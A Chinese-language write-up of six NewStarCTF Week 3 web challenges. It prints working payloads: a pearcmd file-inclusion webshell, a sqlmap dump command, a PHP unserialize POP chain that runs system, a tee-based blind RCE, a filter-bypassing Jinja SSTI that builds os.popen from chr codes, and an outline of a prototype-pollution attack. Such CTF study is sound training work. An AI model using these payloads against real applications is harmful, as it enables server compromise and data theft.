【Web】NewStarCTF Week3 个人复现

目录

①Include 🍐

 ②medium_sql

③POP Gadget 

④R!!!C!!!E!!!

⑤GenShin 

⑥OtenkiGirl

①Include 🍐

 ?file=phpinfo

提示查下register_argc_argv 

发现为on

LFI包含 pearcmd命令执行学习

pearcmd.php文件包含妙用

?file=/usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['a'])?>+./ha.php

 ?file=./ha

 post传：

a=system('tac /f*');

 ②medium_sql

sqlmap一把梭了

python sqlmap.py -u "http://61456133-e5e5-437c-9049-06164553df7c.node4.buuoj.cn:81/?id=TMP0919" -D ctf -T here_is_flag -C flag --dump --batch

③POP Gadget 

 <?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    private $func;

    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }

}

class Handle{
    protected $obj;

    public function __call($func, $vars)
    {
        $this->obj->end();
    }

}

class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}

@unserialize($_POST['pop']); 

手搓链子

Begin::__destruct -> Then::__toString -> Super::__invoke -> Handle::__call() -> CTF::end() -> WhiteGod::__unset

构造

<?php
class Begin{
    public $name;
}

class Then{
    public $func;

}

class Handle{
    public $obj;

}

class Super{
    public $obj;
}

class CTF{
    public $handle;

}

class WhiteGod{
    public $func;
    public $var;
}
//@unserialize($_POST['pop']);

$b = new Begin();
$t = new Then();
$s = new Super();
$h = new Handle();
$c = new CTF();
$w = new WhiteGod();

$b->name = $t;
$t->func = $s;
$s->obj = $h;
$h->obj = $c;
$c->handle = $w;

$w->func = "system";
$w->var = "cat /flag";

echo urlencode(serialize($b));

payload:

pop=O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22var%22%3Bs%3A9%3A%22cat%20%2Fflag%22%3B%7D%7D%7D%7D%7D%7D

把空格url编码后的“+”改为%20 

④R!!!C!!!E!!!

无回显rce，禁了.号，基本不能反弹shell了，但可以考虑tee写文件

构造

$a=new minipop();
$b=new minipop();
$a->qwejaskdjnlka=$b;
$b->code="cat /flag_is_h3eeere | t''ee 1";
echo serialize($a);

 payload=O:7:"minipop":2:{s:4:"code";N;s:13:"qwejaskdjnlka";O:7:"minipop":2:{s:4:"code";s:30:"cat /flag_is_h3eeere | t''ee 1";s:13:"qwejaskdjnlka";N;}}

访问url/1即可拿到flag

⑤GenShin 

进来先是信息搜集

抓包看响应头

访问/secr3tofpop

?name=1

发现输什么回显什么，猜测有ssti

?name={{7*7}}

显然过滤了{{

按套路走即可

?name={%print(7*7)%}

 ?name={%print""|attr("__class__")|attr("__base__")|attr("__subclasses__")()%}

 复制<class 'os._wrap_close'>前的所有内容，放到vscode里检索,数量为132

这里init被过滤我们采用’’+’’进行绕过 即in’’+’’it 

 ?name={%print""|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr(132)|attr("__in"+"it__")|attr("__globals__")%}

发现存在eval

popen被过滤 但是我们可用采用chr编码进行绕过

?name={%print""|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr(132)|attr("__in"+"it__")|attr("__globals__")|attr("get")("__builtins__")|attr("get")("eval")("eval(chr(95)%2bchr(95)%2bchr(105)%2bchr(109)%2bchr(112)%2bchr(111)%2bchr(114)%2bchr(116)%2bchr(95)%2bchr(95)%2bchr(40)%2bchr(39)%2bchr(111)%2bchr(115)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(112)%2bchr(111)%2bchr(112)%2bchr(101)%2bchr(110)%2bchr(40)%2bchr(39)%2bchr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(114)%2bchr(101)%2bchr(97)%2bchr(100)%2bchr(40)%2bchr(41))")%} 

拿到flag

⑥OtenkiGirl

到手先看一眼附件

 随便填点东西提交，抓包看看

 看info.js

可以进行一个sql的查

声明了一个变量minTimestamp，将其初始化为CONFIG.min_public_time或DEFAULT_CONFIG.min_public_time的日期对象的时间戳。这里的CONFIG.min_public_time和DEFAULT_CONFIG.min_public_time表示了movie的最小公开时间。

接下来，代码使用Math.max函数将timestamp与minTimestamp比较，并返回较大的值。timestamp是另一个变量，表示某个数据的时间戳。通过执行这个比较操作，可以确保timestamp的值不早于minTimestamp，也就是不早于movie的最小公开时间。(只要传入timestamp=0即可保证用minTimestamp进行sql查询)

结合下述代码，只要/info/0即可查询出更多数据

看config.js

 config.default.js

发现config.js里面没有min_public_time 

利用||的短路机制，直接原型链污染config.js即可绕过最早时间限制，获取任意时间的数据

看submit.js

发现merge函数，直接利用即可

 payload:

进行一波原型链的污染，然后查数据库得到flag